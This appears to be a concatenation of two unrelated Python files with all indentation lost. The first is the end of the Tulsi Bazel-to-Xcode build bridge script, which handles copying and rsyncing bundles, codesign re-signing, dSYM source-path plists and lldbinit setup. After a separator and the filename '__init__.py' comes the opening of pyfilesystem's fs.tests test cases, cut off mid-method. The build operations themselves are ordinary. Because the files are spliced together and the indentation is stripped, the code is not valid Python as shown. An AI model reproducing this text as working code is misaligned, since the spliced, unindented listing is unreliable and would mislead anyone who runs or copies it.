if build_event.files:
outputs = [x for x in build_event.files if x.endswith('.tulsiouts')]
new_outputs.extend(outputs)
return new_outputs
def ReaderThread(file_handle, out_buffer):
out_buffer.append(file_handle.read())
file_handle.close()
# Make sure the BEP JSON file exists and is empty. We do this to prevent
# any sort of race between the watcher, bazel, and the old file contents.
open(self.build_events_file_path, 'w').close()
# Capture the stderr and stdout from Bazel. We only display it if it we're
# unable to read any BEP events.
process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1)
# Register atexit function to clean up BEP file.
atexit.register(_BEPFileExitCleanup, self.build_events_file_path)
global CLEANUP_BEP_FILE_AT_EXIT
CLEANUP_BEP_FILE_AT_EXIT = True
# Start capturing output from Bazel.
reader_buffer = []
reader_thread = threading.Thread(target=ReaderThread,
args=(process.stdout, reader_buffer))
reader_thread.daemon = True
reader_thread.start()
with io.open(self.build_events_file_path, 'r', -1, 'utf-8', 'ignore'
) as bep_file:
watcher = bazel_build_events.BazelBuildEventsWatcher(bep_file,
_PrintXcodeWarning)
output_locations = []
while process.returncode is None:
output_locations.extend(WatcherUpdate(watcher))
time.sleep(0.1)
process.poll()
output_locations.extend(WatcherUpdate(watcher))
# If BEP JSON parsing failed, we should display the raw stdout and
# stderr from Bazel.
reader_thread.join()
if not watcher.has_read_events():
HandleOutput(reader_buffer[0])
if process.returncode == 0 and not output_locations:
CLEANUP_BEP_FILE_AT_EXIT = False
_PrintXcodeError('Unable to find location of the .tulsiouts file.'
'Please report this as a Tulsi bug, including the'
'contents of %s.' % self.build_events_file_path)
return 1, output_locations
return process.returncode, output_locations
def _ExtractAspectOutputsData(self, output_files):
"""Converts aspect output from paths to json to a list of dictionaries.
Args:
output_files: A list of strings to files representing Bazel aspect output
in UTF-8 JSON format.
Returns:
return_code, [dict]: A tuple with a return code as its first argument and
for its second argument, a list of dictionaries for
each output_file that could be interpreted as valid
JSON, representing the returned Bazel aspect
information.
return_code, None: If an error occurred while converting the list of
files into JSON.
"""
outputs_data = []
for output_file in output_files:
try:
output_data = json.load(open(output_file))
except (ValueError, IOError) as e:
_PrintXcodeError('Failed to load output map ""%s". '
'%s' % (output_file, e))
return 600, None
outputs_data.append(output_data)
return 0, outputs_data
def _InstallArtifact(self, outputs_data):
"""Installs Bazel-generated artifacts into the Xcode output directory."""
xcode_artifact_path = self.artifact_output_path
if not outputs_data:
_PrintXcodeError('Failed to load top level output file.')
return 600
primary_output_data = outputs_data[0]
if 'artifact' not in primary_output_data:
_PrintXcodeError(
'Failed to find an output artifact for target %s in output map %r' %
(xcode_artifact_path, primary_output_data))
return 601
primary_artifact = primary_output_data['artifact']
artifact_archive_root = primary_output_data.get('archive_root')
bundle_name = primary_output_data.get('bundle_name')
# The PRODUCT_NAME used by the Xcode project is not trustable as it may be
# modified by the user and, more importantly, may have been modified by
# Tulsi to disambiguate multiple targets with the same name.
self.bazel_product_name = bundle_name
# We need to handle IPAs (from {ios, tvos}_application) differently from
# ZIPs (from the other bundled rules) because they output slightly different
# directory structures.
is_ipa = primary_artifact.endswith('.ipa')
is_zip = primary_artifact.endswith('.zip')
if is_ipa or is_zip:
expected_bundle_name = bundle_name + self.wrapper_suffix
# The directory structure within the IPA is then determined based on
# Bazel's package and/or product type.
if is_ipa:
bundle_subpath = os.path.join('Payload', expected_bundle_name)
else:
# If the artifact is a ZIP, assume that the bundle is the top-level
# directory (this is the way in which Skylark rules package artifacts
# that are not standalone IPAs).
bundle_subpath = expected_bundle_name
# Prefer to copy over files from the archive root instead of unzipping the
# ipa/zip in order to help preserve timestamps. Note that the archive root
# is only present for local builds; for remote builds we must extract from
# the zip file.
if self._IsValidArtifactArchiveRoot(artifact_archive_root, bundle_name):
source_location = os.path.join(artifact_archive_root, bundle_subpath)
exit_code = self._RsyncBundle(os.path.basename(primary_artifact),
source_location,
xcode_artifact_path)
else:
exit_code = self._UnpackTarget(primary_artifact,
xcode_artifact_path,
bundle_subpath)
if exit_code:
return exit_code
elif os.path.isfile(primary_artifact):
# Remove the old artifact before copying.
if os.path.isfile(xcode_artifact_path):
try:
os.remove(xcode_artifact_path)
except OSError as e:
_PrintXcodeError('Failed to remove stale output file ""%s". '
'%s' % (xcode_artifact_path, e))
return 600
exit_code = self._CopyFile(os.path.basename(primary_artifact),
primary_artifact,
xcode_artifact_path)
if exit_code:
return exit_code
else:
self._InstallBundle(primary_artifact,
xcode_artifact_path)
# When the rules output a tree artifact, Tulsi will copy the bundle as is
# into the expected Xcode output location. But because they're copied as
# is from the bazel output, they come with bazel's permissions, which are
# read only. Here we set them to write as well, so Xcode can modify the
# bundle too (for example, for codesigning).
chmod_timer = Timer('Modifying permissions of output bundle',
'bundle_chmod').Start()
self._PrintVerbose('Spawning subprocess to add write permissions to '
'copied bundle...')
process = subprocess.Popen(['chmod', '-R', 'uga+w', xcode_artifact_path])
process.wait()
chmod_timer.End()
# No return code check as this is not an essential operation.
self._InstallEmbeddedBundlesIfNecessary(primary_output_data)
return 0
def _IsValidArtifactArchiveRoot(self, archive_root, bundle_name):
"""Returns true if the archive root is valid for use."""
if not archive_root or not os.path.isdir(archive_root):
return False
# The archive root will not be updated for any remote builds, but will be
# valid for local builds. We detect this by using an implementation detail
# of the rules_apple bundler: archives will always be transformed from
# <name>.unprocessed.zip (locally or remotely) to <name>.archive-root.
#
# Thus if the mod time on the archive root is not greater than the mod
# time on the on the zip, the archive root is not valid. Remote builds
# will end up copying the <name>.unprocessed.zip but not the
# <name>.archive-root, making this a valid temporary solution.
#
# In the future, it would be better to have this handled by the rules;
# until then this should suffice as a work around to improve build times.
unprocessed_zip = os.path.join(os.path.dirname(archive_root),
'%s.unprocessed.zip' % bundle_name)
if not os.path.isfile(unprocessed_zip):
return False
return os.path.getmtime(archive_root) > os.path.getmtime(unprocessed_zip)
def _InstallEmbeddedBundlesIfNecessary(self, output_data):
"""Install embedded bundles next to the current target's output."""
# In order to find and load symbols for the binary installed on device,
# Instruments needs to "see" it in Spotlight index somewhere on the local
# filesystem. This is only needed for on-device instrumentation.
#
# Unfortunatelly, it does not seem to be possible to detect when a build is
# being made for profiling, thus we can't exclude this step for on-device
# non-profiling builds.
if self.is_simulator or ('embedded_bundles' not in output_data):
return
timer = Timer('Installing embedded bundles',
'installing_embedded_bundles').Start()
for bundle_info in output_data['embedded_bundles']:
bundle_name = bundle_info['bundle_name']
bundle_extension = bundle_info['bundle_extension']
full_name = bundle_name + bundle_extension
output_path = os.path.join(self.built_products_dir, full_name)
# TODO(b/68936732): See if copying just the binary (not the whole bundle)
# is enough to make Instruments work.
if self._IsValidArtifactArchiveRoot(bundle_info['archive_root'],
bundle_name):
source_path = os.path.join(bundle_info['archive_root'], full_name)
self._RsyncBundle(full_name, source_path, output_path)
else:
# Try to find the embedded bundle within the installed main bundle.
bundle_path = self._FindEmbeddedBundleInMain(bundle_name,
bundle_extension)
if bundle_path:
self._RsyncBundle(full_name, bundle_path, output_path)
else:
_PrintXcodeWarning('Could not find bundle %s in main bundle. ' %
(bundle_name + bundle_extension) +
'Device-level Instruments debugging will be '
'disabled for this bundle. Please report a '
'Tulsi bug and attach a full Xcode build log.')
timer.End()
# Maps extensions to anticipated subfolders.
_EMBEDDED_BUNDLE_PATHS = {
'.appex': 'PlugIns',
'.framework': 'Frameworks'
}
def _FindEmbeddedBundleInMain(self, bundle_name, bundle_extension):
"""Retrieves the first embedded bundle found within our main bundle."""
main_bundle = os.environ.get('EXECUTABLE_FOLDER_PATH')
if not main_bundle:
return None
main_bundle_path = os.path.join(self.built_products_dir,
main_bundle)
return self._FindEmbeddedBundle(bundle_name,
bundle_extension,
main_bundle_path)
def _FindEmbeddedBundle(self, bundle_name, bundle_extension, bundle_path):
"""Retrieves the first embedded bundle found within this bundle path."""
embedded_subfolder = self._EMBEDDED_BUNDLE_PATHS.get(bundle_extension)
if not embedded_subfolder:
return None
projected_bundle_path = os.path.join(bundle_path,
embedded_subfolder,
bundle_name + bundle_extension)
if os.path.isdir(projected_bundle_path):
return projected_bundle_path
# For frameworks not in the main app bundle, and possibly other executable
# bundle content in the future, we recurse through every .appex in PlugIns
# to find those frameworks.
#
# This won't support frameworks that could potentially have the same name
# but are different between the app and extensions, but we intentionally
# choose not to handle that case. Xcode build system only supports
# uniquely named frameworks, and we shouldn't confuse the dynamic loader
# with frameworks that have the same image names but different content.
appex_root_path = os.path.join(bundle_path, 'PlugIns')
if not os.path.isdir(appex_root_path):
return None
# Find each directory within appex_root_path and attempt to find a bundle.
# If one can't be found, return None.
appex_dirs = os.listdir(appex_root_path)
for appex_dir in appex_dirs:
appex_path = os.path.join(appex_root_path, appex_dir)
path = self._FindEmbeddedBundle(bundle_name,
bundle_extension,
appex_path)
if path:
return path
return None
def _InstallGeneratedHeaders(self, outputs):
"""Invokes install_genfiles.py to install generated Bazel files."""
genfiles_timer = Timer('Installing generated headers',
'installing_generated_headers').Start()
# Resolve the path to the install_genfiles.py script.
# It should be in the same directory as this script.
path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'install_genfiles.py')
args = [path, self.bazel_exec_root]
args.extend(outputs)
self._PrintVerbose('Spawning subprocess install_genfiles.py to copy '
'generated files in the background...')
process = subprocess.Popen(args)
process.wait()
genfiles_timer.End()
def _InstallBundle(self, source_path, output_path):
"""Copies the bundle at source_path to output_path."""
if not os.path.isdir(source_path):
return 0, None
if os.path.isdir(output_path):
try:
shutil.rmtree(output_path)
except OSError as e:
_PrintXcodeError('Failed to remove stale bundle ""%s". '
'%s' % (output_path, e))
return 700, None
exit_code = self._CopyBundle(os.path.basename(source_path),
source_path,
output_path)
return exit_code, output_path
def _RsyncBundle(self, source_path, full_source_path, output_path):
"""Rsyncs the given bundle to the given expected output path."""
self._PrintVerbose('Copying %s to %s' % (source_path, output_path))
# rsync behavior changes based on presence of a trailing slash.
if not full_source_path.endswith('/'):
full_source_path += '/'
try:
# Use -c to check differences by checksum, -v for verbose,
# and --delete to delete stale files.
# The rest of the flags are the same as -a but without preserving
# timestamps, which is done intentionally so the timestamp will
# only change when the file is changed.
subprocess.check_output(['rsync',
'-vcrlpgoD',
'--delete',
full_source_path,
output_path],
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
_PrintXcodeError('Rsync failed. %s' % e)
return 650
return 0
def _CopyBundle(self, source_path, full_source_path, output_path):
"""Copies the given bundle to the given expected output path."""
self._PrintVerbose('Copying %s to %s' % (source_path, output_path))
try:
CopyOnWrite(full_source_path, output_path, tree=True)
except OSError as e:
_PrintXcodeError('Copy failed. %s' % e)
return 650
return 0
def _CopyFile(self, source_path, full_source_path, output_path):
"""Copies the given file to the given expected output path."""
self._PrintVerbose('Copying %s to %s' % (source_path, output_path))
output_path_dir = os.path.dirname(output_path)
if not os.path.exists(output_path_dir):
try:
os.makedirs(output_path_dir)
except OSError as e:
_PrintXcodeError('Failed to create output directory "%s". '
'%s' % (output_path_dir, e))
return 650
try:
CopyOnWrite(full_source_path, output_path)
except OSError as e:
_PrintXcodeError('Copy failed. %s' % e)
return 650
return 0
def _UnpackTarget(self, bundle_path, output_path, bundle_subpath):
"""Unpacks generated bundle into the given expected output path."""
self._PrintVerbose('Unpacking %s to %s' % (bundle_path, output_path))
if not os.path.isfile(bundle_path):
_PrintXcodeError('Generated bundle not found at "%s"' % bundle_path)
return 670
if os.path.isdir(output_path):
try:
shutil.rmtree(output_path)
except OSError as e:
_PrintXcodeError('Failed to remove stale output directory ""%s". '
'%s' % (output_path, e))
return 600
# We need to handle IPAs (from {ios, tvos}_application) differently from
# ZIPs (from the other bundled rules) because they output slightly different
# directory structures.
is_ipa = bundle_path.endswith('.ipa')
with zipfile.ZipFile(bundle_path, 'r') as zf:
for item in zf.infolist():
filename = item.filename
# Support directories do not seem to be needed by the debugger and are
# skipped.
basedir = filename.split(os.sep)[0]
if basedir.endswith('Support') or basedir.endswith('Support2'):
continue
if len(filename) < len(bundle_subpath):
continue
attributes = (item.external_attr >> 16) & 0o777
self._PrintVerbose('Extracting %s (%o)' % (filename, attributes),
level=1)
if not filename.startswith(bundle_subpath):
_PrintXcodeWarning('Mismatched extraction path. Bundle content '
'at "%s" expected to have subpath of "%s"' %
(filename, bundle_subpath))
dir_components = self._SplitPathComponents(filename)
# Get the file's path, ignoring the payload components if the archive
# is an IPA.
if is_ipa:
subpath = os.path.join(*dir_components[2:])
else:
subpath = os.path.join(*dir_components[1:])
target_path = os.path.join(output_path, subpath)
# Ensure the target directory exists.
try:
target_dir = os.path.dirname(target_path)
if not os.path.isdir(target_dir):
os.makedirs(target_dir)
except OSError as e:
_PrintXcodeError(
'Failed to create target path "%s" during extraction. %s' % (
target_path, e))
return 671
# If the archive item looks like a file, extract it.
if not filename.endswith(os.sep):
with zf.open(item) as src, file(target_path, 'wb') as dst:
shutil.copyfileobj(src, dst)
# Patch up the extracted file's attributes to match the zip content.
if attributes:
os.chmod(target_path, attributes)
return 0
def _InstallDSYMBundles(self, output_dir, outputs_data):
"""Copies any generated dSYM bundles to the given directory."""
# Indicates that our aspect reports a dSYM was generated for this build.
has_dsym = outputs_data[0]['has_dsym']
if not has_dsym:
return 0, None
# Start the timer now that we know we have dSYM bundles to install.
timer = Timer('Installing DSYM bundles', 'installing_dsym').Start()
# Declares the Xcode-generated name of our main target's dSYM.
# This environment variable is always set, for any possible Xcode output
# that could generate a dSYM bundle.
target_dsym = os.environ.get('DWARF_DSYM_FILE_NAME')
if target_dsym:
dsym_to_process = set([(self.build_path, target_dsym)])
# Collect additional dSYM bundles generated by the dependencies of this
# build such as extensions or frameworks.
child_dsyms = set()
for data in outputs_data:
for bundle_info in data.get('embedded_bundles', []):
if not bundle_info['has_dsym']:
continue
# Uses the parent of archive_root to find dSYM bundles associated with
# app/extension/df bundles. Currently hinges on implementation of the
# build rules.
dsym_path = os.path.dirname(bundle_info['archive_root'])
bundle_full_name = (bundle_info['bundle_name'] +
bundle_info['bundle_extension'])
dsym_filename = '%s.dSYM' % bundle_full_name
child_dsyms.add((dsym_path, dsym_filename))
dsym_to_process.update(child_dsyms)
dsyms_found = []
for dsym_path, dsym_filename in dsym_to_process:
input_dsym_full_path = os.path.join(dsym_path, dsym_filename)
output_full_path = os.path.join(output_dir, dsym_filename)
exit_code, path = self._InstallBundle(input_dsym_full_path,
output_full_path)
if exit_code:
_PrintXcodeWarning('Failed to install dSYM "%s" (%s)'
% (dsym_filename, exit_code))
elif path is None:
_PrintXcodeWarning('Could not find a dSYM bundle named "%s"'
% dsym_filename)
else:
dsyms_found.append(path)
timer.End()
return 0, dsyms_found
def _ResignBundle(self, bundle_path, signing_identity, entitlements=None):
"""Re-signs the bundle with the given signing identity and entitlements."""
if not self.codesigning_allowed:
return 0
timer = Timer('\tSigning ' + bundle_path, 'signing_bundle').Start()
command = [
'xcrun',
'codesign',
'-f',
'--timestamp=none',
'-s',
signing_identity,
]
if entitlements:
command.extend(['--entitlements', entitlements])
else:
command.append('--preserve-metadata=entitlements')
command.append(bundle_path)
returncode, output = self._RunSubprocess(command)
timer.End()
if returncode:
_PrintXcodeError('Re-sign command %r failed. %s' % (command, output))
return 800 + returncode
return 0
def _ResignTestArtifacts(self):
"""Resign test related artifacts that Xcode injected into the outputs."""
if not self.is_test:
return 0
# Extract the signing identity from the bundle at the expected output path
# since that's where the signed bundle from bazel was placed.
signing_identity = self._ExtractSigningIdentity(self.artifact_output_path)
if not signing_identity:
return 800
exit_code = 0
timer = Timer('Re-signing injected test host artifacts',
'resigning_test_host').Start()
if self.test_host_binary:
# For Unit tests, we need to resign the frameworks that Xcode injected
# into the test host bundle.
test_host_bundle = os.path.dirname(self.test_host_binary)
exit_code = self._ResignXcodeTestFrameworks(
test_host_bundle, signing_identity)
else:
# For UI tests, we need to resign the UI test runner app and the
# frameworks that Xcode injected into the runner app. The UI Runner app
# also needs to be signed with entitlements.
exit_code = self._ResignXcodeTestFrameworks(
self.codesigning_folder_path, signing_identity)
if exit_code == 0:
entitlements_path = self._InstantiateUIRunnerEntitlements()
if entitlements_path:
exit_code = self._ResignBundle(
self.codesigning_folder_path,
signing_identity,
entitlements_path)
else:
_PrintXcodeError('Could not instantiate UI runner entitlements.')
exit_code = 800
timer.End()
return exit_code
def _ResignXcodeTestFrameworks(self, bundle, signing_identity):
"""Re-signs the support frameworks injected by Xcode in the given bundle."""
if not self.codesigning_allowed:
return 0
for framework in XCODE_INJECTED_FRAMEWORKS:
framework_path = os.path.join(
bundle, 'Frameworks', framework)
if os.path.isdir(framework_path) or os.path.isfile(framework_path):
exit_code = self._ResignBundle(framework_path, signing_identity)
if exit_code != 0:
return exit_code
return 0
def _InstantiateUIRunnerEntitlements(self):
"""Substitute team and bundle identifiers into UI runner entitlements.
This method throws an IOError exception if the template wasn't found in
its expected location, or an OSError if the expected output folder could
not be created.
Returns:
The path to where the entitlements file was generated.
"""
if not self.codesigning_allowed:
return None
if not os.path.exists(self.derived_sources_folder_path):
os.makedirs(self.derived_sources_folder_path)
output_file = os.path.join(
self.derived_sources_folder_path,
self.bazel_product_name + '_UIRunner.entitlements')
if os.path.exists(output_file):
os.remove(output_file)
with open(self.runner_entitlements_template, 'r') as template:
contents = template.read()
contents = contents.replace(
'$(TeamIdentifier)',
self._ExtractSigningTeamIdentifier(self.artifact_output_path))
contents = contents.replace(
'$(BundleIdentifier)',
self._ExtractSigningBundleIdentifier(self.artifact_output_path))
with open(output_file, 'w') as output:
output.write(contents)
return output_file
def _ExtractSigningIdentity(self, signed_bundle):
"""Returns the identity used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'Authority')
def _ExtractSigningTeamIdentifier(self, signed_bundle):
"""Returns the team identifier used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'TeamIdentifier')
def _ExtractSigningBundleIdentifier(self, signed_bundle):
"""Returns the bundle identifier used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'Identifier')
def _ExtractSigningAttribute(self, signed_bundle, attribute):
"""Returns the attribute used to sign the given bundle path."""
if not self.codesigning_allowed:
return '<CODE_SIGNING_ALLOWED=NO>'
cached = self.codesign_attributes.get(signed_bundle)
if cached:
return cached.Get(attribute)
timer = Timer('\tExtracting signature for ' + signed_bundle,
'extracting_signature').Start()
output = subprocess.check_output(['xcrun',
'codesign',
'-dvv',
signed_bundle],
stderr=subprocess.STDOUT)
timer.End()
bundle_attributes = CodesignBundleAttributes(output)
self.codesign_attributes[signed_bundle] = bundle_attributes
return bundle_attributes.Get(attribute)
def _UpdateLLDBInit(self, clear_source_map=False):
"""Updates ~/.lldbinit-tulsiproj to enable debugging of Bazel binaries."""
# Make sure a reference to ~/.lldbinit-tulsiproj exists in ~/.lldbinit or
# ~/.lldbinit-Xcode. Priority is given to ~/.lldbinit-Xcode if it exists,
# otherwise the bootstrapping will be written to ~/.lldbinit.
BootstrapLLDBInit()
with open(TULSI_LLDBINIT_FILE, 'w') as out:
out.write('# This file is autogenerated by Tulsi and should not be '
'edited.\n')
if clear_source_map:
out.write('settings clear target.source-map\n')
return 0
if self.normalized_prefix_map:
source_map = ('./', self._NormalizePath(self.workspace_root))
out.write('# This maps the normalized root to that used by '
'%r.\n' % os.path.basename(self.project_file_path))
else:
# NOTE: settings target.source-map is different from
# DBGSourcePathRemapping; the former is an LLDB target-level
# remapping API that rewrites breakpoints, the latter is an LLDB
# module-level remapping API that changes DWARF debug info in memory.
#
# If we had multiple remappings, it would not make sense for the
# two APIs to share the same mappings. They have very different
# side-effects in how they individually handle debug information.
source_map = self._ExtractTargetSourceMap()
out.write('# This maps Bazel\'s execution root to that used by '
'%r.\n' % os.path.basename(self.project_file_path))
out.write('settings set target.source-map "%s" "%s"\n' % source_map)
return 0
def _DWARFdSYMBinaries(self, dsym_bundle_path):
"""Returns an array of abs paths to DWARF binaries in the dSYM bundle.
Args:
dsym_bundle_path: absolute path to the dSYM bundle.
Returns:
str[]: a list of strings representing the absolute paths to each binary
found within the dSYM bundle.
"""
dwarf_dir = os.path.join(dsym_bundle_path,
'Contents',
'Resources',
'DWARF')
dsym_binaries = []
for f in os.listdir(dwarf_dir):
# Ignore hidden files, such as .DS_Store files.
if not f.startswith('.'):
# Append full path info.
dsym_binary = os.path.join(dwarf_dir, f)
dsym_binaries.append(dsym_binary)
return dsym_binaries
def _UUIDInfoForBinary(self, source_binary_path):
"""Returns exit code of dwarfdump along with every UUID + arch found.
Args:
source_binary_path: absolute path to the binary file.
Returns:
(Int, str[(str, str)]): a tuple containing the return code of dwarfdump
as its first element, and a list of strings
representing each UUID found for each given
binary slice found within the binary with its
given architecture, if no error has occcured.
"""
returncode, output = self._RunSubprocess([
'xcrun',
'dwarfdump',
'--uuid',
source_binary_path
])
if returncode:
_PrintXcodeWarning('dwarfdump returned %d while finding the UUID for %s'
% (returncode, source_binary_path))
return (returncode, [])
# All UUIDs for binary slices will be returned as the second from left,
# from output; "UUID: D4DE5AA2-79EE-36FE-980C-755AED318308 (x86_64)
# /Applications/Calendar.app/Contents/MacOS/Calendar"
uuids_found = []
for dwarfdump_output in output.split('\n'):
if not dwarfdump_output:
continue
found_output = re.match(r'^(?:UUID: )([^ ]+) \(([^)]+)', dwarfdump_output)
if not found_output:
continue
found_uuid = found_output.group(1)
if not found_uuid:
continue
found_arch = found_output.group(2)
if not found_arch:
continue
uuids_found.append((found_uuid, found_arch))
return (0, uuids_found)
def _CreateUUIDPlist(self, dsym_bundle_path, uuid, arch, source_maps):
"""Creates a UUID.plist in a dSYM bundle to redirect sources.
Args:
dsym_bundle_path: absolute path to the dSYM bundle.
uuid: string representing the UUID of the binary slice with paths to
remap in the dSYM bundle.
arch: the architecture of the binary slice.
source_maps: list of tuples representing all absolute paths to source
files compiled by Bazel as strings ($0) associated with the
paths to Xcode-visible sources used for the purposes of
Tulsi debugging as strings ($1).
Returns:
Bool: True if no error was found, or False, representing a failure to
write when creating the plist.
"""
# Create a UUID plist at (dsym_bundle_path)/Contents/Resources/.
remap_plist = os.path.join(dsym_bundle_path,
'Contents',
'Resources',
'%s.plist' % uuid)
# Via an XML plist, add the mappings from _ExtractTargetSourceMap().
try:
with open(remap_plist, 'w') as out:
out.write('<?xml version="1.0" encoding="UTF-8"?>\n'
'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
'<plist version="1.0">\n'
'<dict>\n'
'<key>DBGSourcePathRemapping</key>\n'
'<dict>\n')
for source_map in source_maps:
# Add the mapping as a DBGSourcePathRemapping to the UUID plist here.
out.write('<key>%s</key>\n<string>%s</string>\n' % source_map)
# Make sure that we also set DBGVersion to 3.
out.write('</dict>\n'
'<key>DBGVersion</key>\n'
'<string>3</string>\n'
'</dict>\n'
'</plist>\n')
except OSError as e:
_PrintXcodeError('Failed to write %s, received error %s' %
(remap_plist, e))
return False
# Update the dSYM symbol cache with a reference to this dSYM bundle.
err_msg = self.update_symbol_cache.UpdateUUID(uuid,
dsym_bundle_path,
arch)
if err_msg:
_PrintXcodeWarning('Attempted to save (uuid, dsym_bundle_path, arch) '
'to DBGShellCommands\' dSYM cache, but got error '
'\"%s\".' % err_msg)
return True
def _CleanExistingDSYMs(self):
"""Clean dSYM bundles that were left over from a previous build."""
output_dir = self.built_products_dir
output_dir_list = os.listdir(output_dir)
for item in output_dir_list:
if item.endswith('.dSYM'):
shutil.rmtree(os.path.join(output_dir, item))
def _PlistdSYMPaths(self, dsym_bundle_path):
"""Adds Plists to a given dSYM bundle to redirect DWARF data."""
# Retrieve the paths that we are expected to remap.
# Always include a direct path from the execroot to Xcode-visible sources.
source_maps = [self._ExtractTargetSourceMap()]
# Remap relative paths from the workspace root.
if self.normalized_prefix_map:
# Take the normalized path and map that to Xcode-visible sources.
source_maps.append(('./', self._NormalizePath(self.workspace_root)))
# Find the binaries within the dSYM bundle. UUIDs will match that of the
# binary it was based on.
dsym_binaries = self._DWARFdSYMBinaries(dsym_bundle_path)
if not dsym_binaries:
_PrintXcodeWarning('Could not find the binaries that the dSYM %s was '
'based on to determine DWARF binary slices to patch. '
'Debugging will probably fail.' % (dsym_bundle_path))
return 404
# Find the binary slice UUIDs with dwarfdump from each binary.
for source_binary_path in dsym_binaries:
returncode, uuid_info_found = self._UUIDInfoForBinary(source_binary_path)
if returncode:
return returncode
# Create a plist per UUID, each indicating a binary slice to remap paths.
for uuid, arch in uuid_info_found:
plist_created = self._CreateUUIDPlist(dsym_bundle_path,
uuid,
arch,
source_maps)
if not plist_created:
return 405
return 0
def _NormalizePath(self, path):
"""Returns paths with a common form, normalized with a trailing slash.
Args:
path: a file system path given in the form of a string.
Returns:
str: a normalized string with a trailing slash, based on |path|.
"""
return os.path.normpath(path) + os.sep
def _ExtractTargetSourceMap(self, normalize=True):
"""Extracts the source path as a tuple associated with the WORKSPACE path.
Args:
normalize: Defines if all paths should be normalized. Preferred for APIs
like DBGSourcePathRemapping and target.source-map but won't
work for the purposes of -fdebug-prefix-map.
Returns:
None: if an error occurred.
(str, str): a single tuple representing all absolute paths to source
files compiled by Bazel as strings ($0) associated with
the paths to Xcode-visible sources used for the purposes
of Tulsi debugging as strings ($1).
"""
# All paths route to the "workspace root" for sources visible from Xcode.
sm_destpath = self.workspace_root
if normalize:
sm_destpath = self._NormalizePath(sm_destpath)
# Add a redirection for the Bazel execution root, the path where sources
# are referenced by Bazel.
sm_execroot = self.bazel_exec_root
if normalize:
sm_execroot = self._NormalizePath(sm_execroot)
return (sm_execroot, sm_destpath)
def _LinkTulsiWorkspace(self):
"""Links the Bazel Workspace to the Tulsi Workspace (`tulsi-workspace`)."""
tulsi_workspace = self.workspace_root + '/tulsi-workspace'
if os.path.islink(tulsi_workspace):
os.unlink(tulsi_workspace)
os.symlink(self.bazel_exec_root, tulsi_workspace)
if not os.path.exists(tulsi_workspace):
_PrintXcodeError(
'Linking Tulsi Workspace to %s failed.' % tulsi_workspace)
return -1
@staticmethod
def _SplitPathComponents(path):
"""Splits the given path into an array of all of its components."""
components = path.split(os.sep)
# Patch up the first component if path started with an os.sep
if not components[0]:
components[0] = os.sep
return components
def _RunSubprocess(self, cmd):
"""Runs the given command as a subprocess, returning (exit_code, output)."""
self._PrintVerbose('%r' % cmd, 1)
process = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output, _ = process.communicate()
return (process.returncode, output)
def _PrintVerbose(self, msg, level=0):
if self.verbose > level:
_PrintUnbuffered(msg)
def main(argv):
build_settings = bazel_build_settings.BUILD_SETTINGS
if build_settings is None:
_Fatal('Unable to resolve build settings. Please report a Tulsi bug.')
return 1
return BazelBuildBridge(build_settings).Run(argv)
if __name__ == '__main__':
_LockFileAcquire('/tmp/tulsi_bazel_build.lock')
_logger = tulsi_logging.Logger()
logger_warning = tulsi_logging.validity_check()
if logger_warning:
_PrintXcodeWarning(logger_warning)
_timer = Timer('Everything', 'complete_build').Start()
signal.signal(signal.SIGINT, _InterruptHandler)
_exit_code = main(sys.argv)
_timer.End()
sys.exit(_exit_code)
|
__init__.py
|
#!/usr/bin/env python
"""
fs.tests: testcases for the fs module
"""
# Send any output from the logging module to stdout, so it will
# be captured by nose and reported appropriately
import sys
import logging
logging.basicConfig(level=logging.ERROR, stream=sys.stdout)
from fs.base import *
from fs.path import *
from fs.errors import *
from fs.filelike import StringIO
import datetime
import unittest
import os
import os.path
import pickle
import random
import copy
import time
try:
import threading
except ImportError:
import dummy_threading as threading
import six
from six import PY3, b
class FSTestCases(object):
"""Base suite of testcases for filesystem implementations.
Any FS subclass should be capable of passing all of these tests.
To apply the tests to your own FS implementation, simply use FSTestCase
as a mixin for your own unittest.TestCase subclass and have the setUp
method set self.fs to an instance of your FS implementation.
NB. The Filesystem being tested must have a capacity of at least 3MB.
This class is designed as a mixin so that it's not detected by test
loading tools such as nose.
"""
def check(self, p):
"""Check that a file exists within self.fs"""
return self.fs.exists(p)
def test_invalid_chars(self):
"""Check paths validate ok"""
# Will have to be overriden selectively for custom validepath methods
self.assertEqual(self.fs.validatepath(''), None)
self.assertEqual(self.fs.validatepath('.foo'), None)
self.assertEqual(self.fs.validatepath('foo'), None)
self.assertEqual(self.fs.validatepath('foo/bar'), None)
self.assertTrue(self.fs.isvalidpath('foo/bar'))
def test_tree(self):
"""Test tree print"""
self.fs.makedir('foo')
self.fs.createfile('foo/bar.txt')
self.fs.tree()
def test_meta(self):
"""Checks getmeta / hasmeta are functioning"""
# getmeta / hasmeta are hard to test, since there is no way to validate
# the implementation's response
meta_names = ["read_only",
"network",
"unicode_paths"]
stupid_meta = 'thismetashouldnotexist!"r$$%^&&*()_+'
self.assertRaises(NoMetaError, self.fs.getmeta, stupid_meta)
self.assertFalse(self.fs.hasmeta(stupid_meta))
self.assertEqual(None, self.fs.getmeta(stupid_meta, None))
self.assertEqual(3.14, self.fs.getmeta(stupid_meta, 3.14))
for meta_name in meta_names:
try:
meta = self.fs.getmeta(meta_name)
self.assertTrue(self.fs.hasmeta(meta_name))
except NoMetaError:
self.assertFalse(self.fs.hasmeta(meta_name))
def test_root_dir(self):
self.assertTrue(self.fs.isdir(""))
self.assertTrue(self.fs.isdir("/"))
# These may be false (e.g. empty dict) but mustn't raise errors
self.fs.getinfo("")
self.assertTrue(self.fs.getinfo("/") is not None)
def test_getsyspath(self):
try:
syspath = self.fs.getsyspath("/")
except NoSysPathError:
pass
else:
self.assertTrue(isinstance(syspath, str))
syspath = self.fs.getsyspath("/", allow_none=True)
if syspath is not None:
self.assertTrue(isinstance(syspath, str))
def test_debug(self):
str(self.fs)
repr(self.fs)
self.assertTrue(hasattr(self.fs, 'desc'))
def test_open_on_directory(self):
self.fs.makedir("testdir")
try:
f = self.fs.open("testdir")
